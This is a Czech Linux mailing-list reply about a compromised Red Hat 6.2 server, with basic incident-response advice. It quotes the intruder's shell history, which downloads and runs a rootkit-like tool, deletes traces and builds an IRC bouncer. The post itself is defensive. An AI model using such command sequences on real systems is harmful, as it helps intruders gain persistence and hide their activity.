hacknuto: user cgi s pravy roota
Marcel Kolaja
xkolaja na aurora.fi.muni.cz
Středa Březen 28 08:51:31 CEST 2001
On Tue, 27 Mar 2001, Libor wrote:
> a to se mi stalo na serveru (dial-up) se standartním RH 6.2.CZ
To se ani moc nedivím.
> V /home/cgi/ jsem našel (naštěstí) následující .bash_history :
>
> ftp ftp.tripod.com
> ls
> tar -zxvf ark-1.0.tar.gz
> rm -rf ark-1.0.tar.gz
> cd ark-1.0/
> ./ark muiegrasa
> cd
> cd /root
> rm -rf ark-1.0/
> tar -zxvf psyBNC2.2.1.tar.gz
> cd psybnc/
> make
>
> Zná někdo volané programy? Tam se zřejmě dělo velice moc.
Jo. Koukám, že ten psyBNC je nějaká oblíbená věc poslední dobou :-) Je to
nějaký IRC Relaying server či co. Něco o tom je určitě k nalezení na
googlu.
> Vypadá to na kompletní přeinstalaci.
Pokud na tom serveru neběželo moc věcí a nebude reinstalace moc náročná,
tak asi jo.
> Může mě někdo nakopnout jak se tam bad boy mohl dostat.
Co Vám tam běželo za služby? Třeba wu-ftpd?
> Je to teda smršť - spíš bych prosil o radu, kam se podívat, co hledat
> jak odhalit slabinu, a jak ji zalepit.
nmapnout si stroj, jestli tam neběží něco navíc. Zkontrolovat databázi rpm
(takové to rpm -Va nebo jak se to dělá). Vyhledat všechny adresáře, které
začínají tečkou, ... (spoustu věcí :-)).
> Libor
S pozdravem
Marcel Kolaja http://www.fi.muni.cz/~xkolaja/
NLPlab FI MU http://nlp.fi.muni.cz/
-----------------------------------------------------------------
"MS is a lot better at making money than
it is at making good operating systems."
Linus Torvalds
*****************************************************************
* Petition For A Software Patent Free Europe *
* http://petition.eurolinux.org/ *
*****************************************************************
Další informace o konferenci Linux